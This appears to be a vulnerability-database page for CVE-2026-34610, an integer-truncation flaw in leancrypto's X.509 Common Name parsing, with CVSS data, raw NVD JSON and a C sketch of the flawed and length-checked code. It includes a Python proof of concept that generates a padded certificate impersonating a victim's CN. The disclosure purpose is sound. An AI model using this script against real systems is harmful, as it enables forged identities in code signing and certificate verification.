Security Vulnerability Report
CVE-2026-34610 CVSS 5.9 MEDIUM

CVE-2026-34610

Published: 2026-04-02 18:16:33
Last Modified: 2026-04-24 13:01:11

Description

The leancrypto library is a cryptographic library that contains only PQC-resistant cryptographic algorithms. Prior to version 1.7.1, lc_x509_extract_name_segment() casts size_t vlen to uint8_t when storing the Common Name (CN) length. An attacker who crafts a certificate with CN = victim's CN + 256 bytes padding gets cn_size = (uint8_t)(256 + N) = N, where N is the victim's CN length. The first N bytes of the attacker's CN are the victim's identity. After parsing, the attacker's certificate has an identical CN to the victim's — enabling identity impersonation in PKCS#7 verification, certificate chain matching, and code signing. This issue has been patched in version 1.7.1.
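
The narrowing cast described above, reduced to a minimal C sketch next to a length-checked variant. This is an added example, not leancrypto's code: struct name_seg, store_cn_truncating, store_cn_checked, cn_equal and demo are hypothetical names, the input is constructed, and the length check is one possible hardening, not necessarily the change made in 1.7.1.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical parsed-name record, not leancrypto's real structure. */
struct name_seg {
    const uint8_t *cn;
    uint8_t cn_size; /* 8-bit length field, as in the description */
};

/* Vulnerable pattern: size_t narrowed to uint8_t, so 266 is stored as 10. */
static void store_cn_truncating(struct name_seg *out, const uint8_t *v, size_t vlen) {
    out->cn = v;
    out->cn_size = (uint8_t)vlen;
}

/* Hardened pattern: reject any length the field cannot represent. */
static int store_cn_checked(struct name_seg *out, const uint8_t *v, size_t vlen) {
    if (vlen > UINT8_MAX)
        return -1;
    out->cn = v;
    out->cn_size = (uint8_t)vlen;
    return 0;
}

/* Comparison as a verifier might do it: stored length, then bytes. */
static int cn_equal(const struct name_seg *a, const struct name_seg *b) {
    return a->cn_size == b->cn_size && memcmp(a->cn, b->cn, a->cn_size) == 0;
}

/* Returns 1 if the names compare equal, 0 if not, -1 if the parser rejects. */
int demo(int use_checked) {
    static const uint8_t victim[] = "victim.com"; /* constructed 10-byte CN */
    uint8_t crafted[10 + 256];                    /* same bytes plus padding */
    struct name_seg a, b;
    memcpy(crafted, victim, 10);
    memset(crafted + 10, 'A', 256);
    (void)store_cn_checked(&a, victim, 10);       /* 10 always fits */
    if (!use_checked)
        store_cn_truncating(&b, crafted, sizeof(crafted));
    else if (store_cn_checked(&b, crafted, sizeof(crafted)) != 0)
        return -1;
    return cn_equal(&a, &b);
}

int main(void) {
    printf("truncating: %d, checked: %d\n", demo(0), demo(1));
    return 0;
}
```

RFC 5280 caps commonName at 64 characters (ub-common-name), so a parser can reject oversized CNs well below the 255-byte limit of the length field.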

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:leancrypto:leancrypto:*:*:*:*:*:*:*:* - VULNERABLE
leancrypto < 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
import datetime

# Generate a private key for the attacker
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
    backend=default_backend()
)

# Target CN (e.g., "victim.com")
target_cn = "victim.com"
n = len(target_cn)

# Calculate padding to trigger the integer truncation
# The vulnerable code does: cn_size = (uint8_t)(vlen)
# We need vlen = N + 256, so (uint8_t)(N + 256) = N
padding_length = 256
malicious_cn = target_cn + ("A" * padding_length)

print(f"[+] Target CN Length: {n}")
print(f"[+] Malicious CN Length: {len(malicious_cn)}")
print(f"[+] Malicious CN Content: {malicious_cn[:30]}...{malicious_cn[-30:]}")

# Create a self-signed certificate with the malicious CN
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
    # Inject the crafted CN to exploit the truncation bug
    x509.NameAttribute(NameOID.COMMON_NAME, malicious_cn),
])

cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    private_key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    datetime.datetime.utcnow()
).not_valid_after(
    datetime.datetime.utcnow() + datetime.timedelta(days=365)
).sign(private_key, hashes.SHA256(), default_backend())

# Save the malicious certificate
with open("malicious_cert.der", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.DER))

print("[!] Generated malicious_cert.der. When parsed by leancrypto < 1.7.1, the CN will be truncated to 'victim.com'.")
```

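References

https://github.com/smuellerDD/leancrypto/commit/5cdcbe12bd6c3d6e87e969972a580b44a74c3a6a (Patch)
https://github.com/smuellerDD/leancrypto/releases/tag/v1.7.1 (Product, Release Notes)
https://github.com/smuellerDD/leancrypto/security/advisories/GHSA-636g-jxv4-v4gr (Vendor Advisory)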

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-34610", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:32.567", "lastModified": "2026-04-24T13:01:10.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The leancrypto library is a cryptographic library that exclusively contains only PQC-resistant cryptographic algorithms. Prior to version 1.7.1, lc_x509_extract_name_segment() casts size_t vlen to uint8_t when storing the Common Name (CN) length. An attacker who crafts a certificate with CN = victim's CN + 256 bytes padding gets cn_size = (uint8_t)(256 + N) = N, where N is the victim's CN length. The first N bytes of the attacker's CN are the victim's identity. After parsing, the attacker's certificate has an identical CN to the victim's — enabling identity impersonation in PKCS#7 verification, certificate chain matching, and code signing. This issue has been patched in version 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-681"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leancrypto:leancrypto:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "EEBE3140-06FC-43FD-B7D3-D96E65CD4B38"}]}]}], "references": [{"url": "https://github.com/smuellerDD/leancrypto/commit/5cdcbe12bd6c3d6e87e969972a580b44a74c3a6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/smuellerDD/leancrypto/releases/tag/v1.7.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/smuellerDD/leancrypto/security/advisories/GHSA-636g-jxv4-v4gr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```